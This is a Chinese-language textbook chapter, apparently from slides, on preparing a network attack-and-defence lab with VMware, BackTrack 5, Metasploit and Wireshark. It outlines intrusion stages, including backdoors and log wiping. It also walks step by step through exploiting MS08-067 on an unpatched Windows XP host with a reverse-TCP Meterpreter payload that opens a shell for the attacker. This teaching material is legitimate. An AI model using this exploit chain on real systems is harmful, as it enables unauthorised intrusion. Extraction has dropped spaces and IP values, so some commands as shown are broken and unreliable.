网络攻防准备

第01章网络攻防准备By王隆杰目录1.1黑客简介1.2VMWareWorkstation虚拟机软件1.3BackTrack5安全平台1.4Metasploit渗透工具1.5Wireshark包分析工具1.6GNS3网络设备模拟器1.1黑客简介1.1.1什么是黑客（1）黑客（Hacker）：他们都是水平高超的电脑专家，尤其是程序设计人员，是一个统称。（2）红客（Honker）：维护国家利益，代表人民的意志，他们热爱自己的祖国、民族、和平，极力维护国家安全与尊严。（3）骇客（Cracker）：“破解者”的意思。从事恶意破解商业软件、恶意入侵别人的网站等事务，与黑客近义。其实黑客与骇客本质上是相同的，都是闯入他人计算机系统的入侵者。黑客和骇客并没有一个十分明显的界限，随着两者的含义越来越模糊，公众也不太区分两者的含义了。1.1黑客简介1.1.2黑客入侵的步骤黑客攻击大致可以分为五个步骤：搜索、扫描、获得权限、保持连接，消除痕迹1.第一阶段：搜索搜索可能是很耗时的，有时候可能会持续几个星期甚至几个月。黑客会利用各种渠道尽可能多地了解企业，包括以下手段：（1）在Internet上搜索，（2）社会工程，（3）垃圾数据搜寻，（4）域名信息收集，（5）非侵入性的网络扫描。这些类型的活动很难防范的。很多公司的信息在Internet上都很容易搜索到，员工也往往会无意中提供了相应的信息，公司的组织结构以及潜在的漏洞就会被发现。2.第二阶段：扫描一旦黑客对公司网络的具体情况有了足够的了解，黑客就可以使用扫描软件对目标进行扫描以寻找潜在的漏洞，包括以下信息：（1）每一台局域网/广域网设备的品牌和型号，（2）开放的端口及应用服务，（3）操作系统在内的漏洞，（4）保护性较差的数据传输。在扫描目标时，黑客往往会受到入侵保护系统(IPS)或入侵检测系统(IDS)的阻止，但情况也并非总是如此，技术高超的黑客可以绕过这些防护措施。1.1黑客简介3.第三阶段：获得权限

当黑客收集到足够的信息,对系统的安全弱点有了了解后就会发动攻击。黑客会根据不同的网络结构、不同的系统情况而采用不同的攻击手段。一般黑客攻击的终极目的是能够控制目标系统，窃取其中的机密文件等，但并不是每次黑客攻击都能够控制目标主机，有时黑客也会发动服务拒绝之类的攻击,使系统不能正常工作。4.第四阶段：保持连接黑客利用种种手段进入目标主机系统并获得控制权之后，不是像大家想象的那样会马上进行破坏活动，删除数据、涂改网页等。一般入侵成功后，黑客为了能长时间地保持和巩固他对系统的控制权而不被管理员发现，通常会留下后门。黑客会更改某些系统设置、在系统中种植木马或其他一些远程操纵程序。5.第五阶段：消除痕迹在实现攻击的目的后，黑客通常会采取各种措施来隐藏入侵的痕迹，例如：清除系统的日志。1.2VMWareWorkstation虚拟机软件1.2.1VMWareWorkstation简介

VMwareWorkstation是一款功能强大的桌面虚拟软件，提供用户可在单一的桌面（实体计算机）上同时运行不同的操作系统，是进行开发、测试、部署新的应用程序的最佳解决方案。VMwareWorkstation可在一部实体计算机上模拟完整的网络环境，以及可便于携带的虚拟机器，其更好的灵活性与先进的技术胜过了市面上其他的桌面虚拟软件。对于企业的IT开发人员和系统管理员而言，VMware在虚拟网路，实时快照，拖曳共享文件夹，支持PXE等方面的特点使它成为必不可少的工具。1.2VMWareWorkstation虚拟机软件1.2.2VMWareWorkstation的安装启动VMware安装程序，在“VMwareWorkstationSetup”窗口，单击“Next”按钮。余下步骤，除了下面要介绍的步骤外，均直接单击“Next”按钮。1.2VMWareWorkstation虚拟机软件1.2VMWareWorkstation虚拟机软件如果不习惯VMwareWorkstation英文界面，可以安装汉化补丁。启动补丁程序，选中“我接收许可证协议中的条款”按钮，单击“下一步”按钮。余下个步骤，均单击“下一步”按钮即可。1.2VMWareWorkstation虚拟机软件安装完成后，双击桌面的“VMwareWorkstation”图标，启动程序。1.2VMWareWorkstation虚拟机软件1.2.3VMWareWorkstation的使用1.创建新的虚拟机：VMware可以虚拟出和实体计算机一样的虚拟计算机，虚拟计算机有CPU、RAM、显示器、硬盘、网卡等。如果实体计算机上的CPU、RAM足够强大，可以在VMware上运行多个虚拟机，这样用户就可以把多个虚拟机联网组成一个小网络。1.2VMWareWorkstation虚拟机软件选择“自定义（高级）”单选项，使用该选项，用户可以对虚拟机的硬件配置进行设置。如果对虚拟机无特殊需求，可以选择“标准（推荐）”单选项，这样可以减少创建的步骤。1.2VMWareWorkstation虚拟机软件1.2VMWareWorkstation虚拟机软件VMware只是虚拟了一台计算机而已，就像用户刚组装了一台计算机一样，虚拟计算机并没有操作系统，需要新安装操作系统。可以从光盘，也可以从光盘的镜像文件（ISO文件）来安装操作系统。1.2VMWareWorkstation虚拟机软件1.2VMWareWorkstation虚拟机软件1.2VMWareWorkstation虚拟机软件建议实体计算机上的内存大于：虚拟机个数*1G+2G1.2VMWareWorkstation虚拟机软件1.2VMWareWorkstation虚拟机软件1.2VMWareWorkstation虚拟机软件如果想使用以前创建的虚拟磁盘，可以选择“使用一个已存在的虚拟磁盘”加载即可。如果选择“使用物理磁盘”选项，则虚拟机会把实体计算机上的某个分区作为虚拟磁盘使用，这样可以提高性能，但是不便于把虚拟机复制到其他计算机上，故不建议使用。1.2VMWareWorkstation虚拟机软件1.2VMWareWorkstation虚拟机软件1.2VMWareWorkstation虚拟机软件1.2VMWareWorkstation虚拟机软件1.2VMWareWorkstation虚拟机软件2.编辑虚拟机设置：虽然在创建虚拟机时，已经指定了虚拟机的设置，但是还是可以在创建后，编辑虚拟机的设置。1.2VMWareWorkstation虚拟机软件3.在虚拟机里安装系统1.2VMWareWorkstation虚拟机软件4.使用虚拟计算机（1）虚拟机的电源管理1.2VMWareWorkstation虚拟机软件（2）打开已有的虚拟机:如果之前已经创建了虚拟机，或者从别处拷贝过来，从“开始”→“打开”菜单，在虚拟机所在的目录下找到“.vmx”文件，就能打开虚拟机。（3）从虚拟机中释放键盘和鼠标。如果虚拟机是非Windows系统，例如：Linux、DOS等，则当用户把鼠标移动到虚拟机中并单击，这时实体计算机上的键盘和鼠标就成了虚拟机的键盘和鼠标了。如果要从虚拟机中释放键盘和鼠标，请按左边的“Ctrl+Alt”键。（4）安装VMware工具（VMwareTools）1.2VMWareWorkstation虚拟机软件(5)磁盘的非持久模式:把虚拟机的磁盘模式改为非持久，只要把虚拟机电源关闭，则磁盘上的数据会还原为电源开启之前的状态。1.2VMWareWorkstation虚拟机软件5.虚拟网络配置1.2VMWareWorkstation虚拟机软件一旦在VMware中添加这些虚拟网络，则在实体计算机上的“网络”会生成相应的虚拟网卡（桥接类型的虚拟网络除外）1.2VMWareWorkstation虚拟机软件VMware中，虚拟网络（VMnet）有三种连接模式：（1）桥接：该虚拟网络和实体计算机的网卡以网桥方式连接。虚拟网络和实体计算机上的物理网卡进行桥接，这样使用该虚拟网络的虚拟计算机就能够借用实体计算机的物理网卡和实体网络进行通信了。当然虚拟计算机上的网卡需要配置和实体计算机同一IP网段的IP地址。1.2VMWareWorkstation虚拟机软件（2）NAT：实体计算机上启用了NAT，连接到该虚拟网络的虚拟计算机通过NAT和物理网络进行连接1.2VMWareWorkstation虚拟机软件（3）仅主机：则虚拟网络和实体计算机没有任何网络连接，仅和连接到同一虚拟网络的虚拟计算机之间可以通信。1.2VMWareWorkstation虚拟机软件在VMware中编辑好虚拟网络后，可以在“虚拟机设置”中配置虚拟机网卡和哪个虚拟网络进行连接。1.2VMWareWorkstation虚拟机软件选择“桥接”时，则该虚拟机的网卡和VMnet0虚拟网络进行连接；选择“NAT”时，则该虚拟机的网卡和VMnet8虚拟网络进行连接；选择“仅主机”时，则该虚拟机的网卡和VMnet1虚拟网络进行连接。还可以把网卡连接到自定义的虚拟网络中。1.3BackTrack5安全平台1.3.1BackTrack5简介BackTrack平台集成了大量功能强大但简单易用的安全工具软件，读者会发现以前苦苦追寻的工具赫然在目。虽然BackTrack还是基于Linux，但用户可以直接用菜单或者命令来启动各种工具，不需要编译源代码或安装了，因为这些工具已经集成在BackTrack了。即使有些工具没有被集成进来，用户也只需要执行简单的命令“apt-getinstallXXXX”安装即可，不需要复杂的编译和安装。

是BackTrack的官方网站。

是BackTrack的中文论坛1.3BackTrack5安全平台下载BT5R3-GNOME-VM-32虚拟机文件后，在VMware打开1.3BackTrack5安全平台1.3BackTrack5安全平台1.3.2BackTrack5的使用1.启用图形界面启动BackTrack后，还处于命令行界面，用鼠标单击虚拟机窗口，虚拟机将获得键盘、鼠标的控制权，可以使用左边的“Ctrl+Alt”键释放控制权。用“root”用户登录，密码为“toor”。虽然很多工具可以在命令行下运行，但是对于初学者还是图形界面比较习惯，输入“startx”命令即可。1.3BackTrack5安全平台2.配置网络ifconfig-a//查看所有网卡的信息ifconfigeth0up//启动网卡eth0ifconfigeth0down//关闭网卡eth0dhclienteth0//网卡eth0自动获取IP临时设置网络eth0的IP和子网掩码，重启后丢失echonameserver>/etc/resolv.conf//设置DNS地址为

1.3BackTrack5安全平台设置静态IP，需要编辑/etc/network/interfaces这个文件，内容如下：autoloifaceloinetloopback

#autoeth0#ifaceeth0inetdhcpautoeth0ifaceeth0inetstatic //接口采用静态IPaddress50 //接口的IP地址netmask //掩码network //网络地址broadcast55 //广播地址gateway //网关

编辑、保存/etc/network/interfaces文件后，使用以下命令重启网卡：/etc/init.d/networkingrestart1.3BackTrack5安全平台3.更新或安装应用程序需要经常更新BackTrack，以保证系统是最新的。先使用命令“apt-getupdate”同步索引文件，再使用命令“apt-getupgrade”把所有软件包更新到最新版本，可能需要等待较长一段时间。如果某些软件包没有被集成到BackTrack中来，可以使用“apt-getinstall<软件包名>”命令进行安装。例如：apt-getinstallhunt，hunt是一个TCP会话劫持工具。1.3BackTrack5安全平台1.3BackTrack5安全平台4.关机或重启系统使用“poweroff”命令可以关闭系统，使用“reboot”命令重启系统。1.4Metasploit渗透工具1.4.1Metasploit简介Metasploit是一个号称“黑掉整个星球”、免费的渗透测试工具，通过它可以很容易获得、开发计算机软件的漏洞，并对计算机实施攻击。

Metasploit有免费版和商业版本，MetasploitFramework（MSF）是免费版。

MetasploitFramework已成为一个研究高危漏洞的途径，它集成了各平台上常见的溢出漏洞和流行的Shellcode，并且不断更新。最新版本的

MSF包含了920多种流行的操作系统及应用软件的漏洞，以及250个Shellcode。1.4Metasploit渗透工具1.4.2Metasploit的使用被攻击者是一台没有打补丁的WindowsXPSP2中文版的计算机，这个版本的系统存在MS08-067漏洞1.4Metasploit渗透工具（1）启动Metasploit。BackTrack5R3已经集成了Metasploit，在BackTrack5中打开一个终端，执行“msfconsole”命令，启动控制台。Metasploit有各种各样的模块，所谓的模块是一段代码。模块又有很多种类，典型的有攻击模块（exploit模块），就是用于实际发起渗透的代码；也有辅助模块（auxiliary模块），是执行扫描之类动作的模块。Metasploit还有攻击载荷（Payload），Payload是目标系统被渗透成功后执行的代码。一般是先使用攻击模块对目标系统进行攻击，攻击成功后执行Payload。1.4Metasploit渗透工具在控制台中，可以执行“help”命令查看全部命令帮助，执行“helpsearch”命令则查看“search”命令的帮助信息；使用“exit”则退出控制台，回到Linux终端下。在控制台下，使用“Tab”键能自动补全命令。1.4Metasploit渗透工具使用“show”命令可以查看模块的信息，如下：msf>show【连按两次Tab键】showallshowexploitsshowpayloadsshowauxiliaryshownopsshowpluginsshowencodersshowoptionsshowpostmsf>showexploits //查看有什么攻击模块（exploit模块）msf>showpayload //查看有什么payload如果不知道模块的确切名字，可以使用“search”命令查找：msf>searchms08_067 //查找带“ms08_067”关键字的模块1.4Metasploit渗透工具msf>useexploit/windows/smb/ms08_067_netapi //使用找到的模块msfexploit(ms08_067_netapi)> //进入到模块模式，注意提示符的变化msfexploit(ms08_067_netapi)>setPAYLOADwindows/meterpreter/reverse_tcp//设置所使用的payload，渗透成功后以上的payload会从目标主机发起一个发弹连接

msfexploit(ms08_067_netapi)>showoptions //显示需要设置什么选项//以下是攻击模块需要设置的选项名，如果Required列为yes，则表示该选项是必须值LHOST=>05 //payload反弹后连接的IP，即攻击者的IP

msfexploit(ms08_067_netapi)>showtargets //显示有哪些目标的类型1.4Metasploit渗透工具msfexploit(ms08_067_netapi)>setTARGET17 //目标为WindowsXPSP2中文版TARGET=>17

msfexploit(ms08_067_netapi)>showoptions //把全部设置检查一下msfexploit(ms08_067_netapi)>exploit //开始攻击meterpreter>help //可以查看该模式下的命令帮助meterpreter>shell //进入目标系统的交互命令行shellC:\WINDOWS\system32>^Z //按“Ctrl+z”键Backgroundchannel1?[y/N] //回答“y”，把shell放到后台，频道为1meterpreter> //回到了payload会话meterpreter>background //把payload会话放到后台msfexploit(ms08_067_netapi)> //回到模块模式msfexploit(ms08_067_netapi)>sessions1.4Metasploit渗透工具msfexploit(ms08_067_netapi)>sessions-i1 //使用ID为1的会话[*]Startinginteractionwith1...meterpreter> //回到了之前放到后台payload的会话meterpreter>exit //关闭payload会话，回到模块模式[*]ShuttingdownMeterpreter...msfexploit(ms08_067_netapi)>msfexploit(ms08_067_netapi)>exit //退出msf控制台root@bt:~# //回到了Linux命令提示符1.5Wireshark包分析工具1.5.1Wireshark简介Wireshark（前称Ethereal）是一个网络数据包分析软件，它的功能是捕捉网络数据包，并尽可能显示出最为详细的网络数据包资料。正常情况下，计算机上的网卡收到数据帧时，会查看数据帧的目的MAC和本网卡的MAC地址是否相同。如果不同就丢弃帧，如果相同就接收帧并交给上一层处理。对于广播帧或者组播帧，网卡也会接收下来。计算机上启动网络数据包分析软件情况时，计算机上的网卡会被置为混杂模式，只要数据帧能达到网卡，不论帧的目的MAC和本网卡的MAC地址是否相同，网卡将全部接收并交给网络嗅探器处理。Wireshark的安装非常简单，全部单击“Next”按钮即可。Wireshark依赖WinPcap来工作，如果计算机未安装过WinPcap软件，安装程序会要求安装WinPcap，也是全部单击“Next”按钮即可。1.5Wireshark包分析工具1.5.2Wireshark的使用1.抓包1.5Wireshark包分析工具1.5Wireshark包分析工具1.5Wireshark包分析工具2.过滤器（Filter）的使用Wireshark抓包可能会抓到大量的数据包，但是用户通常不会关心全部的数据包，而只关心特定数据包，因此过滤出想要的数据包就很重要，可以使用过滤器达到目的1.5Wireshark包分析工具1.6